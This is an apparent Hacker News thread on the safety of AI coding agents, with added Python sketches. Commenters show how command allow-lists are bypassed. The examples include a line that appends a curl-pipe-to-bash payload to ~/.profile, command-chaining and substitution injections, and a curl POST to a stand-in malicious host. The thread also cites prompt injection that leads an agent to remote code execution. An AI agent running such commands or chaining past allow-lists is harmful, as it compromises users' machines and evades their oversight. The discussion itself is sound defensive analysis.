
645 points helloplanets | 9 comments
_fat_santa ◴[] No.45005348[source]
IMO the only place you should use agentic AI is where you can easily roll back the changes the AI makes. The best example here is asking AI to build/update/debug some code. You can ask it to make changes, but all those changes are relatively safe, since you can easily roll back with git.

Using agentic AI for web browsing, where you can't easily roll back an action, is just wild to me.

gruez ◴[] No.45005757[source]
> The best example here is asking AI to build/update/debug some code. You can ask it to make changes, but all those changes are relatively safe, since you can easily roll back with git.

Only if the rollback is done at the VM/container level; otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
1. Anon1096 ◴[] No.45006067[source]
You can safeguard against this by having a whitelist of commands that can be run: basically cd, ls, find, grep, the build tool, the linter, etc., which are only informational and local. Mine is set up like that and it works very well.
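A minimal sketch of such a gate, assuming a setup like the one described (the command names and helper are my assumptions, not the commenter's actual config): tokenize the line, reject shell control operators, and only then check the command name against the allow-list.

```python
import shlex

# Hypothetical allow-list gate for agent-issued shell commands.
# ALLOWED is an assumption; adapt it to your own toolchain.
ALLOWED = {"cd", "ls", "find", "grep", "make"}

def is_allowed(command: str) -> bool:
    try:
        tokens = shlex.split(command)
    except ValueError:        # unbalanced quotes, etc.
        return False
    if not tokens:
        return False
    # Reject tokens that chain or substitute commands.
    forbidden = {"&&", "||", ";", "|"}
    if any(tok in forbidden or "$(" in tok or "`" in tok for tok in tokens):
        return False
    return tokens[0] in ALLOWED
```

Note that, as the replies below point out, this still lets `find . -exec evil.sh {} +` through: `find` is an allowed command name, and `-exec` is just an argument to it.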
2. zeroonetwothree ◴[] No.45006092[source]
Everything works very well until there is an exploit.
3. david_allison ◴[] No.45006110[source]
> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

4. gruez ◴[] No.45006112[source]
That's trickier than it sounds. find, for instance, has the -exec action, which allows arbitrary code to be executed. Build tools and linters are also a security nightmare, because their configuration can be modified to execute arbitrary code. And this all assumes you can implement the whitelist properly. A naive check like

    cmd.split(" ")[0] in ["cd", "ls", ...]

is an easy target for command injection. Just to name a few:

    ls . && evil.sh

    ls $(evil.sh)
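To make the failure concrete, here is a runnable version of that naive first-word check (an illustration only), showing that both injection examples pass it, as does find's -exec:

```python
ALLOWED = ["cd", "ls", "find", "grep"]

def naive_check(cmd: str) -> bool:
    # Only looks at the first whitespace-separated word.
    return cmd.split(" ")[0] in ALLOWED

# Both injection examples sail straight through:
print(naive_check("ls . && evil.sh"))            # True
print(naive_check("ls $(evil.sh)"))              # True
# And find's -exec needs no trickery at all:
print(naive_check("find . -exec evil.sh {} +"))  # True
```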
5. FergusArgyll ◴[] No.45006504[source]
Yeah, this is CTF 101; see https://gtfobins.github.io/ for example (it catalogs inheriting sudo from a command, but the same principles can be used for this).
6. chmod775 ◴[] No.45007074[source]
find can execute subcommands (via its -exec argument), and plenty of other shell commands can be used for that as well. Most build tools' configuration can be abused to execute arbitrary commands. And if your LLM can make changes to your codebase and then run it, trying to limit the shell commands it can execute is pointless anyway.

Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.

7. wunderwuzzi23 ◴[] No.45007108[source]
About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...

8. grepfru_it ◴[] No.45008650[source]
Well, a complete implementation would also use inotify(7), which would review all files that were modified.
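Since inotify(7) is a Linux-specific kernel API, here is a portable sketch of the same idea (an illustration, not the inotify API itself): hash every file before and after the agent runs, then diff the two snapshots to see what it touched.

```python
import os, hashlib

def snapshot(root):
    """Map each file path under root to a hash of its contents."""
    state = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                state[path] = hashlib.sha256(f.read()).hexdigest()
    return state

def modified(before, after):
    """Paths created, deleted, or changed between the two snapshots."""
    return {p for p in before.keys() | after.keys()
            if before.get(p) != after.get(p)}
```

Unlike inotify, this only catches changes within the watched tree and only at diff time, but it needs no OS support and makes the post-run review explicit.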
9. diggan ◴[] No.45014240[source]
I'm 99% sure Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands; you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.